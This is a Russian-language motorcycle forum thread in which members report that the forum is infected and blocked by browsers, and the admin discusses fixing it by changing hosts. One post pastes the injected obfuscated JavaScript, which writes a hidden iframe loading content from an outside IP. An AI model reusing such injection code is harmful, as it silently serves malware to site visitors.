хром стал блокировать наш форум

все ваши замечания и предложения по форуму и его развитию
Аватара пользователя
Mag
Сообщения: 260
Зарегистрирован: 09 май 2010, 12:10
Репутация: 0
Пепелац: VS750 Intruder, VTX
Откуда: Ставрополь
Контактная информация:

хром стал блокировать наш форум

Сообщение Mag »

а гугл говорит что:
Безопасный просмотр
Страница диагностики для 213.155.20.0

Занесен ли сайт 213.155.20.0 в список подозрительных веб-сайтов?
В данный момент этот сайт не занесен в список подозрительных веб-сайтов.

В некоторой части этого сайта несколько раз (2) за последние 90 дней была замечена подозрительная активность.

Что произошло во время последнего просмотра этого сайта компанией Google?
Из протестированных нами за последние 90 дней страниц данного сайта (2) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 1. Последний раз сайт просматривался Google 2011-02-05, а подозрительное содержание было обнаружено 2011-02-05.
Malicious software includes 1034 scripting exploit(s).

Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая nowtostream.in/.

This site was hosted on 1 network(s) including AS41665 (HOSTING).

Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?
По всей видимости, за последние 90 дней сайт 213.155.20.0 действовал в качестве промежуточного звена в заражении других сайтов (180), включая begun.ru/, veneziavillanegyed.hu/, foroli4ka.org.ua/.

Размещается ли на этом сайте вредоносное программное обеспечение?
Да. За последние 90 дней на этом сайте размещалось вредоносное программное обеспечение. Были заражены некоторые домены (97), включая city-bowling.ru/, mosteploservis.ru/, komkon-penza.ru/.
Ваша девушка прослужит Вам дольше, если на нее тоже одевать шлем.
Изображение
Аватара пользователя
mrZoopol
Сообщения: 2130
Зарегистрирован: 26 янв 2011, 21:07
Репутация: 0
Пепелац: Пока нет ))))
Откуда: ЯРОСЛАВЛЬ
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение mrZoopol »

такая же фигня - блокирует
ВСЁ БУДЕТ !!! С НАМИ СИЛА !!!
MrZoopol (JohnyПСИХ)
Изображение
Аватара пользователя
Aikon
Сообщения: 1978
Зарегистрирован: 24 ноя 2009, 14:08
Репутация: 0
Пепелац: VS800GLP '93, YBR 125 '13
Откуда: Воронеж
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение Aikon »

Сайт вирусован! В заголовке каждой страницы присутсвует код. ВОЛК, на хостинге вирь тусует.

Код: Выделить всё

<script language='JavaScript'>n=0;while(n<199)document.write(String.fromCharCode('=ubcmf!xjeui>(1(!cpsefs>(1(?=us!ifjhiu>(1qy(?=ue?=ejw!tuzmf>(pwfsgmpx;tdspmm<!ifjhiu;1qy<!xjeui;1qy(?=jgsbnf!tsd>(iuuq;00324/266/31/20ufoyy0(!xjeui>(47(!ifjhiu>(23(?=0jgsbnf?=0ejw?=0ue?=0us?=0ubcmf?'.charCodeAt(n++)-1))</script><script language='JavaScript'>n=0;while(n<199)document.write(String.fromCharCode('=ubcmf!xjeui>(1(!cpsefs>(1(?=us!ifjhiu>(1qy(?=ue?=ejw!tuzmf>(pwfsgmpx;tdspmm<!ifjhiu;1qy<!xjeui;1qy(?=jgsbnf!tsd>(iuuq;00324/266/31/20ufoyy0(!xjeui>(47(!ifjhiu>(23(?=0jgsbnf?=0ejw?=0ue?=0us?=0ubcmf?'.charCodeAt(n++)-1))</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Аватара пользователя
wragina
Сообщения: 1319
Зарегистрирован: 30 сен 2010, 21:54
Репутация: 0
Пепелац: v-strom
Откуда: Питер

Re: хром стал блокировать наш форум

Сообщение wragina »

ага, стали всплывающие окна постоянно появляца
Аватара пользователя
PROstoBiker
Сообщения: 86
Зарегистрирован: 17 дек 2010, 17:51
Репутация: 0
Пепелац: ипатека
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение PROstoBiker »

Хромом не пользуюсь, но в опере последние 2 дня что-то с форумом не то, все шрифты стали ацки большими и все как-то побилось. В остальных форумах и сайтах все гуд.
B.B.
Сообщения: 150
Зарегистрирован: 19 окт 2010, 12:39
Репутация: 0
Пепелац: VS1400
Откуда: Волгодонск

Re: хром стал блокировать наш форум

Сообщение B.B. »

PROstoBiker писал(а):Хромом не пользуюсь, но в опере последние 2 дня что-то с форумом не то, все шрифты стали ацки большими и все как-то побилось. В остальных форумах и сайтах все гуд.
такаяж фигня!А чо стряслось-то?
Аватара пользователя
Западный мотор
Сообщения: 337
Зарегистрирован: 10 май 2010, 14:03
Репутация: 0
Пепелац: кустом1400
Откуда: Калининград

Re: хром стал блокировать наш форум

Сообщение Западный мотор »

B.B. писал(а):
PROstoBiker писал(а):Хромом не пользуюсь, но в опере последние 2 дня что-то с форумом не то, все шрифты стали ацки большими и все как-то побилось. В остальных форумах и сайтах все гуд.
такаяж фигня!А чо стряслось-то?
+1, фаервол какие-то всплывающие окна постоянно блокирует
не бывает атеистов в окопах под огнём... Е. Летов
Аватара пользователя
mrZoopol
Сообщения: 2130
Зарегистрирован: 26 янв 2011, 21:07
Репутация: 0
Пепелац: Пока нет ))))
Откуда: ЯРОСЛАВЛЬ
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение mrZoopol »

АДМИНЫ !!! ГДЕ ВЫ !!! .............. сделайте что нибудь.........))
ВСЁ БУДЕТ !!! С НАМИ СИЛА !!!
MrZoopol (JohnyПСИХ)
Изображение
Аватара пользователя
Sniff
Сообщения: 231
Зарегистрирован: 16 фев 2010, 14:01
Репутация: 0
Пепелац: Intruder 1400 GLF
Откуда: Владивосток
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение Sniff »

да х%%е я уже привык =))) это как форум для слабовидящих байкеров с АГРОММНЫМИ букафками !!!
loud pipes save lives
Intruder 1400
Аватара пользователя
санька
Сообщения: 180
Зарегистрирован: 15 окт 2010, 02:59
Репутация: 0
Пепелац: В мечтах 1400)))
Откуда: МО,город Клин
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение санька »

Огромные букафки-это хорошо,конечно:)но,вирусы на компе,как-то не особо хочется терпеть:(через хром-не заходит вообще,жалуется на вирусы,а после входа через огненную лису,решил антивирусом пройтись сразу-нашел один вирус,и это всего за минуту пребывания на нашем любимом форуме:(
Главная прокладка на ТС-Между рулём и сиденьем!!!
Аватара пользователя
mrZoopol
Сообщения: 2130
Зарегистрирован: 26 янв 2011, 21:07
Репутация: 0
Пепелац: Пока нет ))))
Откуда: ЯРОСЛАВЛЬ
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение mrZoopol »

содержит вредоносное ПО с сайта http://www.perevoz.in как то так пишет
Последний раз редактировалось mrZoopol 07 фев 2011, 08:24, всего редактировалось 1 раз.
ВСЁ БУДЕТ !!! С НАМИ СИЛА !!!
MrZoopol (JohnyПСИХ)
Изображение
Bruce Willis
Сообщения: 647
Зарегистрирован: 23 ноя 2009, 21:21
Репутация: 0
Пепелац: -

Re: хром стал блокировать наш форум

Сообщение Bruce Willis »

Это уже ни в какие ворота не лезет!

лядь, неужели нельзя нормально обслуживать сайт?

У меня получается включиться только через IE, все прочие браузеры скидывают на домашнюю страницу.
Аватара пользователя
Bormann
Сообщения: 79
Зарегистрирован: 14 май 2010, 13:58
Репутация: 0
Пепелац: Suzuki Intruder VS800
Откуда: Москва

Re: хром стал блокировать наш форум

Сообщение Bormann »

Такая же кочерга в Сафари на Mac. Огнелис нормально открыл, но с размером шрифта жестоко.
Похрен, завтра будет лучше!
Переходя дорогу смотрите на машины, а не на светофоры – светофоры еще никого не задавили :)
VOVAN
Сообщения: 121
Зарегистрирован: 08 май 2010, 22:22
Репутация: 0
Пепелац: 1400 тру
Откуда: Астрахань

Re: хром стал блокировать наш форум

Сообщение VOVAN »

такая же хня.
Аватара пользователя
В0ЛК
модератор
Сообщения: 2150
Зарегистрирован: 21 ноя 2009, 20:59
Репутация: 0
Пепелац: Intruder 1800
Откуда: Мск
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение В0ЛК »

мда, сча займусь срочным поиском каких-нить программеров.
Брюс: прежде чем писать про ворота, лядей и тп. Открой глаза и посмотри есть ли на сайте хоть один банер? продажа администрацией сувенирки/запов/мотов по барыжным ценам? если ты еще не заметил то никакой коммерческой состовляющей тут нету. и деньги на содержание сайта идут из моего кармана. милион раз уже писал что я нифига не программер и все движения в этой области сопрежены с оплатой работы людей которые это делают. На сайте 500 человек и ни одни не способен написать/админить сайт, как выяснилось по опросу. Я тоже живой человек и не сижу с открытим трудером 24 часа в сутки. Уехал в Самару на 4 дня и все пипец трындец и звон яиц.


В0ЛК
ЧЕМ БОЛЬШЕ НАС, ТЕМ МЕНЬШЕ ИХ!!!!!
Bruce Willis
Сообщения: 647
Зарегистрирован: 23 ноя 2009, 21:21
Репутация: 0
Пепелац: -

Re: хром стал блокировать наш форум

Сообщение Bruce Willis »

Так в чем же дело?

Куда перечислить деньги? Готов без колебаний платить годовую плату. Сколько?

Сайт начался с 10 человек, зависавших на ОППОЗИТе. Остальные - пришлые, но от этого не чужие люди.

Думаю, многие нормальные ребята также впишутся. Деньги это не проблема. Не пыли.


Ты сам видишь, что происходит. Модераторы нужны. Не один, а 3-4. С расширенными правами. А то затрахали уже своими пиписьками и виаграми.

В Самаре интернет есть?)) Я в Китае был и трудер читал и писал, и harleyforum модерировал - там с местной сеткой в гостинице нелегко было.

Давай, подумай)))
Пора реформы проводить, а?)))
Аватара пользователя
wragina
Сообщения: 1319
Зарегистрирован: 30 сен 2010, 21:54
Репутация: 0
Пепелац: v-strom
Откуда: Питер

Re: хром стал блокировать наш форум

Сообщение wragina »

если надо денег скинемся, на благое дело не жалко, трудерфорум это все! если помочь надо тоже обращайся. чтобы от вирусов почистить надо с людьми связаццо которые хостинг держат, может комп на вирусы просто надо проверить, для этого ненадо быть проламером
Аватара пользователя
В0ЛК
модератор
Сообщения: 2150
Зарегистрирован: 21 ноя 2009, 20:59
Репутация: 0
Пепелац: Intruder 1800
Откуда: Мск
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение В0ЛК »

ну вот связался с товарищем, он адовый мастер по всяким сайтам, и тд. Просканировал форум, говорит что 90% хостеров отакавал вирус, придется хост менять ((((


В0ЛК
ЧЕМ БОЛЬШЕ НАС, ТЕМ МЕНЬШЕ ИХ!!!!!
Аватара пользователя
wragina
Сообщения: 1319
Зарегистрирован: 30 сен 2010, 21:54
Репутация: 0
Пепелац: v-strom
Откуда: Питер

Re: хром стал блокировать наш форум

Сообщение wragina »

В0ЛК писал(а):ну вот связался с товарищем, он адовый мастер по всяким сайтам, и тд. Просканировал форум, говорит что 90% хостеров отакавал вирус, придется хост менять ((((


В0ЛК
Мдя
Аватара пользователя
Manowar
Сообщения: 602
Зарегистрирован: 13 июл 2010, 10:29
Репутация: 0
Пепелац: VS 400
Откуда: Омск
Контактная информация:

Re: хром стал блокировать наш форум

Сообщение Manowar »

о, теперь нормально все стало
прежний шрифт и опера ничего не блокирует
Ответить